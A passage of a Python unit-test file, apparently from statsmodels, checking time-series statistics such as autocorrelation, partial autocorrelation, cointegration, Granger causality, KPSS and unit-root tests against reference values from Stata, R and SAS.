qstat=True,
fft=False,
alpha=0.05,
missing="raise",
)
def test_acf_none(self):
assert_almost_equal(self.res_none[0][1:41], self.acf_none, DECIMAL_8)
def test_acf_drop(self):
assert_almost_equal(self.res_drop[0][1:41], self.acf, DECIMAL_8)
def test_acf_conservative(self):
assert_almost_equal(
self.res_conservative[0][1:41], self.acf, DECIMAL_8
)
def test_qstat_none(self):
# todo why is res1/qstat 1 short
assert_almost_equal(self.res_none[2], self.qstat_none, DECIMAL_3)
# FIXME: enable/xfail/skip or delete
# how to do this test? the correct q_stat depends on whether nobs=len(x) is
# used when x contains NaNs or whether nobs<len(x) when x contains NaNs
# def test_qstat_drop(self):
# assert_almost_equal(self.res_drop[2][:40], self.qstat, DECIMAL_3)
class TestPACF(CheckCorrGram):
@classmethod
def setup_class(cls):
cls.pacfols = cls.results["PACOLS"]
cls.pacfyw = cls.results["PACYW"]
def test_ols(self):
pacfols, confint = pacf(self.x, nlags=40, alpha=0.05, method="ols")
assert_almost_equal(pacfols[1:], self.pacfols, DECIMAL_6)
centered = confint - confint.mean(1)[:, None]
# from edited Stata ado file
res = [[-0.1375625, 0.1375625]] * 40
assert_almost_equal(centered[1:41], res, DECIMAL_6)
# check lag 0
assert_equal(centered[0], [0.0, 0.0])
assert_equal(confint[0], [1, 1])
assert_equal(pacfols[0], 1)
def test_ols_inefficient(self):
lag_len = 5
pacfols = pacf_ols(self.x, nlags=lag_len, efficient=False)
x = self.x.copy()
x -= x.mean()
n = x.shape[0]
lags = np.zeros((n - 5, 5))
lead = x[5:]
direct = np.empty(lag_len + 1)
direct[0] = 1.0
for i in range(lag_len):
lags[:, i] = x[5 - (i + 1) : -(i + 1)]
direct[i + 1] = lstsq(lags[:, : (i + 1)], lead, rcond=None)[0][-1]
assert_allclose(pacfols, direct, atol=1e-8)
def test_yw(self):
pacfyw = pacf_yw(self.x, nlags=40, method="mle")
assert_almost_equal(pacfyw[1:], self.pacfyw, DECIMAL_8)
def test_ld(self):
pacfyw = pacf_yw(self.x, nlags=40, method="mle")
pacfld = pacf(self.x, nlags=40, method="ldb")
assert_almost_equal(pacfyw, pacfld, DECIMAL_8)
pacfyw = pacf(self.x, nlags=40, method="yw")
pacfld = pacf(self.x, nlags=40, method="lda")
assert_almost_equal(pacfyw, pacfld, DECIMAL_8)
class TestBreakvarHeteroskedasticityTest(object):
from scipy.stats import chi2, f
def test_1d_input(self):
input_residuals = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
expected_statistic = (4.0 ** 2 + 5.0 ** 2) / (0.0 ** 2 + 1.0 ** 2)
# ~ F(2, 2), two-sided test
expected_pvalue = 2 * min(
self.f.cdf(expected_statistic, 2, 2),
self.f.sf(expected_statistic, 2, 2),
)
actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
input_residuals
)
assert actual_statistic == expected_statistic
assert actual_pvalue == expected_pvalue
def test_2d_input_with_missing_values(self):
input_residuals = np.array(
[
[0.0, 0.0, np.nan],
[1.0, np.nan, 1.0],
[2.0, 2.0, np.nan],
[3.0, 3.0, 3.0],
[4.0, 4.0, 4.0],
[5.0, 5.0, 5.0],
[6.0, 6.0, 6.0],
[7.0, 7.0, 7.0],
[8.0, 8.0, 8.0],
]
)
expected_statistic = np.array(
[
(8.0 ** 2 + 7.0 ** 2 + 6.0 ** 2)
/ (0.0 ** 2 + 1.0 ** 2 + 2.0 ** 2),
(8.0 ** 2 + 7.0 ** 2 + 6.0 ** 2) / (0.0 ** 2 + 2.0 ** 2),
np.nan,
]
)
expected_pvalue = np.array(
[
2
* min(
self.f.cdf(expected_statistic[0], 3, 3),
self.f.sf(expected_statistic[0], 3, 3),
),
2
* min(
self.f.cdf(expected_statistic[1], 3, 2),
self.f.sf(expected_statistic[1], 3, 2),
),
np.nan,
]
)
actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
input_residuals
)
assert_equal(actual_statistic, expected_statistic)
assert_equal(actual_pvalue, expected_pvalue)
@pytest.mark.parametrize(
"subset_length,expected_statistic,expected_pvalue",
[
(2, 41, 2 * min(f.cdf(41, 2, 2), f.sf(41, 2, 2))),
(0.5, 10, 2 * min(f.cdf(10, 3, 3), f.sf(10, 3, 3))),
],
)
def test_subset_length(
self, subset_length, expected_statistic, expected_pvalue
):
input_residuals = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
input_residuals,
subset_length=subset_length,
)
assert actual_statistic == expected_statistic
assert actual_pvalue == expected_pvalue
@pytest.mark.parametrize(
"alternative,expected_statistic,expected_pvalue",
[
("two-sided", 41, 2 * min(f.cdf(41, 2, 2), f.sf(41, 2, 2))),
("decreasing", 1 / 41, f.sf(1 / 41, 2, 2)),
("increasing", 41, f.sf(41, 2, 2)),
],
)
def test_alternative(
self, alternative, expected_statistic, expected_pvalue
):
input_residuals = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
input_residuals,
alternative=alternative,
)
assert actual_statistic == expected_statistic
assert actual_pvalue == expected_pvalue
def test_use_chi2(self):
input_residuals = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
expected_statistic = (4.0 ** 2 + 5.0 ** 2) / (0.0 ** 2 + 1.0 ** 2)
expected_pvalue = 2 * min(
self.chi2.cdf(2 * expected_statistic, 2),
self.chi2.sf(2 * expected_statistic, 2),
)
actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
input_residuals,
use_f=False,
)
assert actual_statistic == expected_statistic
assert actual_pvalue == expected_pvalue
class CheckCoint(object):
"""
Test Cointegration Test Results for 2-variable system
Test values taken from Stata
"""
levels = ["1%", "5%", "10%"]
data = macrodata.load_pandas()
y1 = data.data["realcons"].values
y2 = data.data["realgdp"].values
def test_tstat(self):
assert_almost_equal(self.coint_t, self.teststat, DECIMAL_4)
# this does not produce the old results anymore
class TestCoint_t(CheckCoint):
"""
Get AR(1) parameter on residuals
"""
@classmethod
def setup_class(cls):
# cls.coint_t = coint(cls.y1, cls.y2, trend="c")[0]
cls.coint_t = coint(cls.y1, cls.y2, trend="c", maxlag=0, autolag=None)[
0
]
cls.teststat = -1.8208817
cls.teststat = -1.830170986148
def test_coint():
nobs = 200
scale_e = 1
const = [1, 0, 0.5, 0]
np.random.seed(123)
unit = np.random.randn(nobs).cumsum()
y = scale_e * np.random.randn(nobs, 4)
y[:, :2] += unit[:, None]
y += const
y = np.round(y, 4)
# FIXME: enable/xfail/skip or delete
for trend in []: # ['c', 'ct', 'ctt', 'n']:
print("\n", trend)
print(coint(y[:, 0], y[:, 1], trend=trend, maxlag=4, autolag=None))
print(coint(y[:, 0], y[:, 1:3], trend=trend, maxlag=4, autolag=None))
print(coint(y[:, 0], y[:, 2:], trend=trend, maxlag=4, autolag=None))
print(coint(y[:, 0], y[:, 1:], trend=trend, maxlag=4, autolag=None))
# results from Stata egranger
res_egranger = {}
# trend = 'ct'
res = res_egranger["ct"] = {}
res[0] = [
-5.615251442239,
-4.406102369132,
-3.82866685109,
-3.532082997903,
]
res[1] = [
-5.63591313706,
-4.758609717199,
-4.179130554708,
-3.880909696863,
]
res[2] = [
-2.892029275027,
-4.758609717199,
-4.179130554708,
-3.880909696863,
]
res[3] = [-5.626932544079, -5.08363327039, -4.502469783057, -4.2031051091]
# trend = 'c'
res = res_egranger["c"] = {}
# first critical value res[0][1] has a discrepancy starting at 4th decimal
res[0] = [
-5.760696844656,
-3.952043522638,
-3.367006313729,
-3.065831247948,
]
# manually adjusted to have higher precision as in other cases
res[0][1] = -3.952321293401682
res[1] = [
-5.781087068772,
-4.367111915942,
-3.783961136005,
-3.483501524709,
]
res[2] = [
-2.477444137366,
-4.367111915942,
-3.783961136005,
-3.483501524709,
]
res[3] = [
-5.778205811661,
-4.735249216434,
-4.152738973763,
-3.852480848968,
]
# trend = 'ctt'
res = res_egranger["ctt"] = {}
res[0] = [
-5.644431269946,
-4.796038299708,
-4.221469431008,
-3.926472577178,
]
res[1] = [-5.665691609506, -5.111158174219, -4.53317278104, -4.23601008516]
res[2] = [-3.161462374828, -5.111158174219, -4.53317278104, -4.23601008516]
res[3] = [
-5.657904558563,
-5.406880189412,
-4.826111619543,
-4.527090164875,
]
# The following for 'n' are only regression test numbers
# trend = 'n' not allowed in egranger
# trend = 'n'
res = res_egranger["n"] = {}
nan = np.nan # shortcut for table
res[0] = [-3.7146175989071137, nan, nan, nan]
res[1] = [-3.8199323012888384, nan, nan, nan]
res[2] = [-1.6865000791270679, nan, nan, nan]
res[3] = [-3.7991270451873675, nan, nan, nan]
with pytest.warns(FutureWarning):
# Ensure warning raised for nc rather than n
coint(y[:, 0], y[:, 1], trend="nc", maxlag=4, autolag=None)
for trend in ["c", "ct", "ctt", "n"]:
res1 = {}
res1[0] = coint(y[:, 0], y[:, 1], trend=trend, maxlag=4, autolag=None)
res1[1] = coint(
y[:, 0], y[:, 1:3], trend=trend, maxlag=4, autolag=None
)
res1[2] = coint(y[:, 0], y[:, 2:], trend=trend, maxlag=4, autolag=None)
res1[3] = coint(y[:, 0], y[:, 1:], trend=trend, maxlag=4, autolag=None)
for i in range(4):
res = res_egranger[trend]
assert_allclose(res1[i][0], res[i][0], rtol=1e-11)
r2 = res[i][1:]
r1 = res1[i][2]
assert_allclose(r1, r2, rtol=0, atol=6e-7)
# use default autolag #4490
res1_0 = coint(y[:, 0], y[:, 1], trend="ct", maxlag=4)
assert_allclose(res1_0[2], res_egranger["ct"][0][1:], rtol=0, atol=6e-7)
# the following is just a regression test
assert_allclose(
res1_0[:2],
[-13.992946638547112, 2.270898990540678e-27],
rtol=1e-10,
atol=1e-27,
)
def test_coint_identical_series():
nobs = 200
scale_e = 1
np.random.seed(123)
y = scale_e * np.random.randn(nobs)
warnings.simplefilter("always", CollinearityWarning)
with pytest.warns(CollinearityWarning):
c = coint(y, y, trend="c", maxlag=0, autolag=None)
assert_equal(c[1], 0.0)
assert_(np.isneginf(c[0]))
def test_coint_perfect_collinearity():
# test uses nearly perfect collinearity
nobs = 200
scale_e = 1
np.random.seed(123)
x = scale_e * np.random.randn(nobs, 2)
y = 1 + x.sum(axis=1) + 1e-7 * np.random.randn(nobs)
warnings.simplefilter("always", CollinearityWarning)
with warnings.catch_warnings(record=True) as w:
c = coint(y, x, trend="c", maxlag=0, autolag=None)
assert_equal(c[1], 0.0)
assert_(np.isneginf(c[0]))
class TestGrangerCausality(object):
def test_grangercausality(self):
# some example data
mdata = macrodata.load_pandas().data
mdata = mdata[["realgdp", "realcons"]].values
data = mdata.astype(float)
data = np.diff(np.log(data), axis=0)
# R: lmtest:grangertest
r_result = [0.243097, 0.7844328, 195, 2] # f_test
gr = grangercausalitytests(data[:, 1::-1], 2, verbose=False)
assert_almost_equal(r_result, gr[2][0]["ssr_ftest"], decimal=7)
assert_almost_equal(
gr[2][0]["params_ftest"], gr[2][0]["ssr_ftest"], decimal=7
)
def test_grangercausality_single(self):
mdata = macrodata.load_pandas().data
mdata = mdata[["realgdp", "realcons"]].values
data = mdata.astype(float)
data = np.diff(np.log(data), axis=0)
gr = grangercausalitytests(data[:, 1::-1], 2, verbose=False)
gr2 = grangercausalitytests(data[:, 1::-1], [2], verbose=False)
assert 1 in gr
assert 1 not in gr2
assert_almost_equal(
gr[2][0]["ssr_ftest"], gr2[2][0]["ssr_ftest"], decimal=7
)
assert_almost_equal(
gr[2][0]["params_ftest"], gr2[2][0]["ssr_ftest"], decimal=7
)
def test_granger_fails_on_nobs_check(self, reset_randomstate):
# Test that if maxlag is too large, Granger Test raises a clear error.
x = np.random.rand(10, 2)
grangercausalitytests(x, 2, verbose=False) # This should pass.
with pytest.raises(ValueError):
grangercausalitytests(x, 3, verbose=False)
def test_granger_fails_on_finite_check(self, reset_randomstate):
x = np.random.rand(1000, 2)
x[500, 0] = np.nan
x[750, 1] = np.inf
with pytest.raises(ValueError, match="x contains NaN"):
grangercausalitytests(x, 2)
def test_granger_fails_on_zero_lag(self, reset_randomstate):
x = np.random.rand(1000, 2)
with pytest.raises(
ValueError,
match="maxlag must be a non-empty list containing only positive integers",
):
grangercausalitytests(x, [0, 1, 2])
class TestKPSS:
"""
R-code
------
library(tseries)
kpss.stat(x, "Level")
kpss.stat(x, "Trend")
In this context, x is the vector containing the
macrodata['realgdp'] series.
"""
@classmethod
def setup(cls):
cls.data = macrodata.load_pandas()
cls.x = cls.data.data["realgdp"].values
def test_fail_nonvector_input(self, reset_randomstate):
# should be fine
with pytest.warns(InterpolationWarning):
kpss(self.x, nlags="legacy")
x = np.random.rand(20, 2)
assert_raises(ValueError, kpss, x)
def test_fail_unclear_hypothesis(self):
# these should be fine,
with pytest.warns(InterpolationWarning):
kpss(self.x, "c", nlags="legacy")
with pytest.warns(InterpolationWarning):
kpss(self.x, "C", nlags="legacy")
with pytest.warns(InterpolationWarning):
kpss(self.x, "ct", nlags="legacy")
with pytest.warns(InterpolationWarning):
kpss(self.x, "CT", nlags="legacy")
assert_raises(
ValueError, kpss, self.x, "unclear hypothesis", nlags="legacy"
)
def test_teststat(self):
with pytest.warns(InterpolationWarning):
kpss_stat, _, _, _ = kpss(self.x, "c", 3)
assert_almost_equal(kpss_stat, 5.0169, DECIMAL_3)
with pytest.warns(InterpolationWarning):
kpss_stat, _, _, _ = kpss(self.x, "ct", 3)
assert_almost_equal(kpss_stat, 1.1828, DECIMAL_3)
def test_pval(self):
with pytest.warns(InterpolationWarning):
_, pval, _, _ = kpss(self.x, "c", 3)
assert_equal(pval, 0.01)
with pytest.warns(InterpolationWarning):
_, pval, _, _ = kpss(self.x, "ct", 3)
assert_equal(pval, 0.01)
def test_store(self):
with pytest.warns(InterpolationWarning):
_, _, _, store = kpss(self.x, "c", 3, True)
# assert attributes, and make sure they're correct
assert_equal(store.nobs, len(self.x))
assert_equal(store.lags, 3)
# test autolag function _kpss_autolag against SAS 9.3
def test_lags(self):
# real GDP from macrodata data set
with pytest.warns(InterpolationWarning):
res = kpss(self.x, "c", nlags="auto")
assert_equal(res[2], 9)
# real interest rates from macrodata data set
res = kpss(sunspots.load().data["SUNACTIVITY"], "c", nlags="auto")
assert_equal(res[2], 7)
# volumes from nile data set
with pytest.warns(InterpolationWarning):
res = kpss(nile.load().data["volume"], "c", nlags="auto")
assert_equal(res[2], 5)
# log-coinsurance from randhie data set
with pytest.warns(InterpolationWarning):
res = kpss(randhie.load().data["lncoins"], "ct", nlags="auto")
assert_equal(res[2], 75)
# in-vehicle time from modechoice data set
with pytest.warns(InterpolationWarning):
res = kpss(modechoice.load().data["invt"], "ct", nlags="auto")
assert_equal(res[2], 18)
def test_kpss_fails_on_nobs_check(self):
# Test that if lags exceeds number of observations KPSS raises a
# clear error
# GH5925
nobs = len(self.x)
msg = r"lags \({}\) must be < number of observations \({}\)".format(
nobs, nobs
)
with pytest.raises(ValueError, match=msg):
kpss(self.x, "c", nlags=nobs)
def test_kpss_autolags_does_not_assign_lags_equal_to_nobs(self):
# Test that if *autolags* exceeds number of observations, we set
# suitable lags
# GH5925
base = np.array([0, 0, 0, 0, 0, 1, 1.0])
data_which_breaks_autolag = np.r_[np.tile(base, 297 // 7), [0, 0, 0]]
kpss(data_which_breaks_autolag, nlags="auto")
def test_legacy_lags(self):
# Test legacy lags are the same
with pytest.warns(InterpolationWarning):
res = kpss(self.x, "c", nlags="legacy")
assert_equal(res[2], 15)
def test_unknown_lags(self):
# Test legacy lags are the same
with pytest.raises(ValueError):
kpss(self.x, "c", nlags="unknown")
def test_none(self):
with pytest.warns(FutureWarning):
kpss(self.x, nlags=None)
class TestRUR:
"""
Simple implementation
------
Since an R implementation of the test cannot be found, the method is tested against
a simple implementation using a for loop.
In this context, x is the vector containing the
macrodata['realgdp'] series.
"""
@classmethod
def setup(cls):
cls.data = macrodata.load_pandas()
cls.x = cls.data.data["realgdp"].values
# To be removed when range unit test gets an R implementation
def simple_rur(self, x, store=False):
x = array_like(x, "x")
store = bool_like(store, "store")
nobs = x.shape[0]
# if m is not one, n != m * n
if nobs != x.size:
raise ValueError("x of shape {0} not understood".format(x.shape))
# Table from [1] has been replicated using 200,000 samples
# Critical values for new n_obs values have been identified
pvals = [0.01, 0.025, 0.05, 0.10, 0.90, 0.95]
n = np.array(
[25, 50, 100, 150, 200, 250, 500, 1000, 2000, 3000, 4000, 5000]
)
crit = np.array(
[
[0.6626, 0.8126, 0.9192, 1.0712, 2.4863, 2.7312],
[0.7977, 0.9274, 1.0478, 1.1964, 2.6821, 2.9613],
[0.907, 1.0243, 1.1412, 1.2888, 2.8317, 3.1393],
[0.9543, 1.0768, 1.1869, 1.3294, 2.8915, 3.2049],
[0.9833, 1.0984, 1.2101, 1.3494, 2.9308, 3.2482],
[0.9982, 1.1137, 1.2242, 1.3632, 2.9571, 3.2482],
[1.0494, 1.1643, 1.2712, 1.4076, 3.0207, 3.3584],
[1.0846, 1.1959, 1.2988, 1.4344, 3.0653, 3.4073],
[1.1121, 1.2200, 1.3230, 1.4556, 3.0948, 3.4439],
[1.1204, 1.2295, 1.3318, 1.4656, 3.1054, 3.4632],
[1.1309, 1.2347, 1.3318, 1.4693, 3.1165, 3.4717],
[1.1377, 1.2402, 1.3408, 1.4729, 3.1252, 3.4807],
]
)
# Interpolation for nobs
inter_crit = np.zeros((1, crit.shape[1]))
for i in range(crit.shape[1]):
f = interp1d(n, crit[:, i])
inter_crit[0, i] = f(nobs)
# Calculate RUR stat
count = 0
max_p = x[0]
min_p = x[0]
for v in x[1:]:
if v > max_p:
max_p = v
count = count + 1
if v < min_p:
min_p = v
count = count + 1
rur_stat = count / np.sqrt(len(x))
k = len(pvals) - 1
for i in range(len(pvals) - 1, -1, -1):
if rur_stat < inter_crit[0, i]:
k = i
else:
break
p_value = pvals[k]
warn_msg = """\
The test statistic is outside of the range of p-values available in the
look-up table. The actual p-value is {direction} than the p-value returned.
"""
direction = ""
if p_value == pvals[-1]:
direction = "smaller"
elif p_value == pvals[0]:
direction = "larger"
if direction:
warnings.warn(
warn_msg.format(direction=direction), InterpolationWarning
)
crit_dict = {
"10%": inter_crit[0, 3],
"5%": inter_crit[0, 2],
"2.5%": inter_crit[0, 1],
"1%": inter_crit[0, 0],
}
if store:
from statsmodels.stats.diagnostic import ResultsStore
rstore = ResultsStore()
rstore.nobs = nobs
rstore.H0 = "The series is not stationary"
rstore.HA = "The series is stationary"
return rur_stat, p_value, crit_dict, rstore
else:
return rur_stat, p_value, crit_dict
def test_fail_nonvector_input(self, reset_randomstate):
with pytest.warns(InterpolationWarning):
range_unit_root_test(self.x)
x = np.random.rand(20, 2)
assert_raises(ValueError, range_unit_root_test, x)
def test_teststat(self):
with pytest.warns(InterpolationWarning):
rur_stat, _, _ = range_unit_root_test(self.x)
simple_rur_stat, _, _ = self.simple_rur(self.x)
assert_almost_equal(rur_stat, simple_rur_stat, DECIMAL_3)
def test_pval(self):
with pytest.warns(InterpolationWarning):
_, pval, _ = range_unit_root_test(self.x)
_, simple_pval, _ = self.simple_rur(self.x)
assert_equal(pval, simple_pval)
def test_store(self):
with pytest.warns(InterpolationWarning):
_, _, _, store = range_unit_root_test(self.x, True)
# assert attributes, and make sure they're correct
assert_equal(store.nobs, len(self.x))
def test_pandasacovf():
s = Series(lrange(1, 11))
assert_almost_equal(acovf(s, fft=False), acovf(s.values, fft=False))
def test_acovf2d(reset_randomstate):
dta = sunspots.load_pandas().data
dta.index = date_range(start="1700", end="2009", freq="A")[:309]
del dta["YEAR"]
res = acovf(dta, fft=False)
assert_equal(res, acovf(dta.values, fft=False))
x = np.random.random((10, 2))
with pytest.raises(ValueError):
acovf(x, fft=False)
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
def test_acovf_fft_vs_convolution(demean, adjusted, reset_randomstate):
q = np.random.normal(size=100)
F1 = acovf(q, demean=demean, adjusted=adjusted, fft=True)
F2 = acovf(q, demean=demean, adjusted=adjusted, fft=False)
assert_almost_equal(F1, F2, decimal=7)
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
def test_ccovf_fft_vs_convolution(demean, adjusted, reset_randomstate):
x = np.random.normal(size=128)
y = np.random.normal(size=128)
F1 = ccovf(x, y, demean=demean, adjusted=adjusted, fft=False)
F2 = ccovf(x, y, demean=demean, adjusted=adjusted, fft=True)
assert_almost_equal(F1, F2, decimal=7)
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
@pytest.mark.parametrize("fft", [True, False])
def test_compare_acovf_vs_ccovf(demean, adjusted, fft, reset_randomstate):
x = np.random.normal(size=128)
F1 = acovf(x, demean=demean, adjusted=adjusted, fft=fft)
F2 = ccovf(x, x, demean=demean, adjusted=adjusted, fft=fft)
assert_almost_equal(F1, F2, decimal=7)
@pytest.mark.smoke
@pytest.mark.slow
def test_arma_order_select_ic():
# smoke test, assumes info-criteria are right
from statsmodels.tsa.arima_process import arma_generate_sample
arparams = np.array([0.75, -0.25])
maparams = np.array([0.65, 0.35])
arparams = np.r_[1, -arparams]
maparam = np.r_[1, maparams] # FIXME: Never used
nobs = 250
np.random.seed(2014)
y = arma_generate_sample(arparams, maparams, nobs)
res = arma_order_select_ic(y, ic=["aic", "bic"], trend="n")
# regression tests in case we change algorithm to minic in sas
aic_x = np.array(
[
[764.36517643, 552.7342255, 484.29687843],
[562.10924262, 485.5197969, 480.32858497],
[507.04581344, 482.91065829, 481.91926034],
[484.03995962, 482.14868032, 483.86378955],
[481.8849479, 483.8377379, 485.83756612],
]
)
bic_x = np.array(
[
[767.88663735, 559.77714733, 494.86126118],
[569.15216446, 496.08417966, 494.41442864],
[517.61019619, 496.99650196, 499.52656493],
[498.12580329, 499.75598491, 504.99255506],
[499.49225249, 504.96650341, 510.48779255],
]
)
aic = DataFrame(aic_x, index=lrange(5), columns=lrange(3))
bic = DataFrame(bic_x, index=lrange(5), columns=lrange(3))
assert_almost_equal(res.aic.values, aic.values, 5)
assert_almost_equal(res.bic.values, bic.values, 5)
assert_equal(res.aic_min_order, (1, 2))
assert_equal(res.bic_min_order, (1, 2))
assert_(res.aic.index.equals(aic.index))
assert_(res.aic.columns.equals(aic.columns))
assert_(res.bic.index.equals(bic.index))
assert_(res.bic.columns.equals(bic.columns))
index = pd.date_range("2000-1-1", freq="M", periods=len(y))
y_series = pd.Series(y, index=index)
res_pd = arma_order_select_ic(
y_series, max_ar=2, max_ma=1, ic=["aic", "bic"], trend="n"
)
assert_almost_equal(res_pd.aic.values, aic.values[:3, :2], 5)
assert_almost_equal(res_pd.bic.values, bic.values[:3, :2], 5)
assert_equal(res_pd.aic_min_order, (2, 1))
assert_equal(res_pd.bic_min_order, (1, 1))
res = arma_order_select_ic(y, ic="aic", trend="n")
assert_almost_equal(res.aic.values, aic.values, 5)
assert_(res.aic.index.equals(aic.index))
assert_(res.aic.columns.equals(aic.columns))
assert_equal(res.aic_min_order, (1, 2))
def test_arma_order_select_ic_failure():
# this should trigger an SVD convergence failure, smoke test that it
# returns, likely platform dependent failure...
# looks like AR roots may be cancelling out for 4, 1?
y = np.array(
[
0.86074377817203640006,
0.85316549067906921611,
0.87104653774363305363,
0.60692382068987393851,
0.69225941967301307667,
0.73336177248909339976,
0.03661329261479619179,
0.15693067239962379955,
0.12777403512447857437,
-0.27531446294481976,
-0.24198139631653581283,
-0.23903317951236391359,
-0.26000241325906497947,
-0.21282920015519238288,
-0.15943768324388354896,
0.25169301564268781179,
0.1762305709151877342,
0.12678133368791388857,
0.89755829086753169399,
0.82667068795350151511,
]
)
import warnings
with warnings.catch_warnings():
# catch a hessian inversion and convergence failure warning
warnings.simplefilter("ignore")
res = arma_order_select_ic(y)
def test_acf_fft_dataframe():
# regression test #322
result = acf(
sunspots.load_pandas().data[["SUNACTIVITY"]], fft=True, nlags=20
)
assert_equal(result.ndim, 1)
def test_levinson_durbin_acov():
rho = 0.9
m = 20
acov = rho ** np.arange(200)
sigma2_eps, ar, pacf, _, _ = levinson_durbin(acov, m, isacov=True)
assert_allclose(sigma2_eps, 1 - rho ** 2)
assert_allclose(ar, np.array([rho] + [0] * (m - 1)), atol=1e-8)
assert_allclose(pacf, np.array([1, rho] + [0] * (m - 1)), atol=1e-8)
@pytest.mark.parametrize("missing", ["conservative", "drop", "raise", "none"])
@pytest.mark.parametrize("fft", [False, True])
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
def test_acovf_nlags(acovf_data, adjusted, demean, fft, missing):
full = acovf(
acovf_data, adjusted=adjusted, demean=demean, fft=fft, missing=missing
)
limited = acovf(
acovf_data,
adjusted=adjusted,
demean=demean,
fft=fft,
missing=missing,
nlag=10,
)
assert_allclose(full[:11], limited)
@pytest.mark.parametrize("missing", ["conservative", "drop"])
@pytest.mark.parametrize("fft", [False, True])
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
def test_acovf_nlags_missing(acovf_data, adjusted, demean, fft, missing):
acovf_data = acovf_data.copy()
acovf_data[1:3] = np.nan
full = acovf(
acovf_data, adjusted=adjusted, demean=demean, fft=fft, missing=missing
)
limited = acovf(
acovf_data,
adjusted=adjusted,
demean=demean,
fft=fft,
missing=missing,
nlag=10,
)
assert_allclose(full[:11], limited)
def test_acovf_error(acovf_data):
with pytest.raises(ValueError):
acovf(acovf_data, nlag=250, fft=False)
def test_pacf2acf_ar():
pacf = np.zeros(10)
pacf[0] = 1
pacf[1] = 0.9
ar, acf = levinson_durbin_pacf(pacf)
assert_allclose(acf, 0.9 ** np.arange(10.0))
assert_allclose(ar, pacf[1:], atol=1e-8)
ar, acf = levinson_durbin_pacf(pacf, nlags=5)
assert_allclose(acf, 0.9 ** np.arange(6.0))
assert_allclose(ar, pacf[1:6], atol=1e-8)
def test_pacf2acf_levinson_durbin():
pacf = -(0.9 ** np.arange(11.0))
pacf[0] = 1
ar, acf = levinson_durbin_pacf(pacf)
_, ar_ld, pacf_ld, _, _ = levinson_durbin(acf, 10, isacov=True)
assert_allclose(ar, ar_ld, atol=1e-8)
assert_allclose(pacf, pacf_ld, atol=1e-8)
# From R, FitAR, PacfToAR
ar_from_r = [
-4.1609,
-9.2549,
-14.4826,
-17.6505,
-17.5012,
-14.2969,
-9.5020,
-4.9184,
-1.7911,
-0.3486,
]
assert_allclose(ar, ar_from_r, atol=1e-4)
def test_pacf2acf_errors():
pacf = -(0.9 ** np.arange(11.0))
pacf[0] = 1
with pytest.raises(ValueError):
levinson_durbin_pacf(pacf, nlags=20)
with pytest.raises(ValueError):
levinson_durbin_pacf(pacf[1:])
with pytest.raises(ValueError):
levinson_durbin_pacf(np.zeros(10))
with pytest.raises(ValueError):
levinson_durbin_pacf(np.zeros((10, 2)))
def test_pacf_burg():
rnd = np.random.RandomState(12345)
e = rnd.randn(10001)
y = e[1:] + 0.5 * e[:-1]
pacf, sigma2 = pacf_burg(y, 10)
yw_pacf = pacf_yw(y, 10)
assert_allclose(pacf, yw_pacf, atol=5e-4)
# Internal consistency check between pacf and sigma2
ye = y - y.mean()
s2y = ye.dot(ye) / 10000
pacf[0] = 0
sigma2_direct = s2y * np.cumprod(1 - pacf ** 2)
assert_allclose(sigma2, sigma2_direct, atol=1e-3)
def test_pacf_burg_error():
with pytest.raises(ValueError):
pacf_burg(np.empty((20, 2)), 10)
with pytest.raises(ValueError):
pacf_burg(np.empty(100), 101)
def test_innovations_algo_brockwell_davis():
ma = -0.9
acovf = np.array([1 + ma ** 2, ma])
theta, sigma2 = innovations_algo(acovf, nobs=4)
exp_theta = np.array([[0], [-0.4972], [-0.6606], [-0.7404]])
assert_allclose(theta, exp_theta, rtol=1e-4)
assert_allclose(sigma2, [1.81, 1.3625, 1.2155, 1.1436], rtol=1e-4)
theta, sigma2 = innovations_algo(acovf, nobs=500)
assert_allclose(theta[-1, 0], ma)
assert_allclose(sigma2[-1], 1.0)
def test_innovations_algo_rtol():
ma = np.array([-0.9, 0.5])
acovf = np.array([1 + (ma ** 2).sum(), ma[0] + ma[1] * ma[0], ma[1]])
theta, sigma2 = innovations_algo(acovf, nobs=500)
theta_2, sigma2_2 = innovations_algo(acovf, nobs=500, rtol=1e-8)
assert_allclose(theta, theta_2)
assert_allclose(sigma2, sigma2_2)
def test_innovations_errors():
ma = -0.9
acovf = np.array([1 + ma ** 2, ma])
with pytest.raises(TypeError):
innovations_algo(acovf, nobs=2.2)
with pytest.raises(ValueError):
innovations_algo(acovf, nobs=-1)
with pytest.raises(ValueError):
innovations_algo(np.empty((2, 2)))
with pytest.raises(TypeError):
innovations_algo(acovf, rtol="none")
def test_innovations_filter_brockwell_davis(reset_randomstate):
ma = -0.9
acovf = np.array([1 + ma ** 2, ma])
theta, _ = innovations_algo(acovf, nobs=4)
e = np.random.randn(5)
endog = e[1:] + ma * e[:-1]
resid = innovations_filter(endog, theta)
expected = [endog[0]]
for i in range(1, 4):
expected.append(endog[i] - theta[i, 0] * expected[-1])
expected = np.array(expected)
assert_allclose(resid, expected)
def test_innovations_filter_pandas(reset_randomstate):
ma = np.array([-0.9, 0.5])
acovf = np.array([1 + (ma ** 2).sum(), ma[0] + ma[1] * ma[0], ma[1]])
theta, _ = innovations_algo(acovf, nobs=10)
endog = np.random.randn(10)
endog_pd = pd.Series(endog, index=pd.date_range("2000-01-01", periods=10))
resid = innovations_filter(endog, theta)
resid_pd = innovations_filter(endog_pd, theta)
assert_allclose(resid, resid_pd.values)
assert_index_equal(endog_pd.index, resid_pd.index)
def test_innovations_filter_errors():
ma = -0.9
acovf = np.array([1 + ma ** 2, ma])
theta, _ = innovations_algo(acovf, nobs=4)
with pytest.raises(ValueError):
innovations_filter(np.empty((2, 2)), theta)
